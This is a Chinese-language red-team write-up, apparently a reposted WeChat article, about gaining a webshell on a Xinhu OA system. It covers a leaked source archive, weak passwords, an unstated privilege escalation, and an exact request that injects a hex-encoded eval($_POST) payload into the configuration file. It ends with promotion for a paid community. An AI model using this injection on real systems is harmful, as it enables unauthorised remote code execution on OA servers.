[攻防实战]爽文一把梭getshell
2023-5-4 11:22:0 Author: 白帽兔(查看原文) 阅读量:22 收藏

前言

梭哈梭哈就是梭哈。

爽文警告

不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。

信息收集

目标为jmc.com

收集到了一个子域名 erp.jmc.com子域名

1

发现子域名存在一个源码泄漏漏洞。

其中oa.zip是源码。

其余都是一个登录页面。

这里重点是oa的登录页面。

oa是信乎OA,根据oa.zip泄漏.找到了公司名单。存在几个弱口令。

2

第一步查看历史漏洞。

发现泄漏出来的漏洞,如果想getshell全部都在后台。

1.后台文件上传getshell

2.后台配置文件getshell

不过都需要是管理员的情况下。

3

如何获取管理员呢?这里查看历史漏洞没有发现什么有价值的。

这里利用了独家秘方的一个越权漏洞。修改+新建把普通用户改成了管理员。

PS:经过本地测试,这里修改后普通用户会存在一些bug。谨慎使用!

4

上传webshell就简单了。--网上很多教程。

这里利用了后台配置文件上传进行getshell,

因为是写入了配置文件,对目标页面会有危险。

在写入后抓紧复原。

/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=21,id=1,name=0x610A6576616C28245F504F53545B315D293B2F2F

清除COOKIES再登录系统 --> 发包:/index.php?a=savecong&m=cog&d=system&ajaxbool=true&rnd=705961

根据教材走,这里就已经成功上传了webshell。shell地址:http://erp.jmc.com/密码为1

5

然后上传一个新的马,恢复配置文件。

6

无法进行命令执行。

全部乱码。修改编码也没啥用。

这里要不把所有的webshell管理工具都尝试一遍,要不就上传php文件尝试。

这里选择了上传phpinfo,发现并未禁用参数。

又上传了system(whoami),发现也是可以成功执行的。

然后利用冰蝎成功命令执行。

星球内容

正式运营星球:

1.src真实漏洞挖掘案例分享(永久不定时更新),过程详细一看就会哦。
2.自研/二开等工具/平台的分享。
3.漏洞分析/资料共享等。

关于文章/Tools获取方式:请关注交流群或者知识星球。

关于交流群:因为某些原因,更改一下交流群的获取方式:

1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。  

关于知识星球的获取方式:

1.后台回复发送 "知识星球",即可获取知识星球二维码。

2如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。  

3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。

免责声明

本公众号文章以技术分享学习为目的。

由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。

一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4NzUzNzgyMw==&mid=2247485680&idx=1&sn=ee38eaf01c2671f2dbeb872d595ea8df&chksm=9036a900a7412016cd09f1f90e6653af0ce33fb18e15685997fcb7da9d533c2d58d2e0935a64#rd
如有侵权请联系:admin#unsafe.sh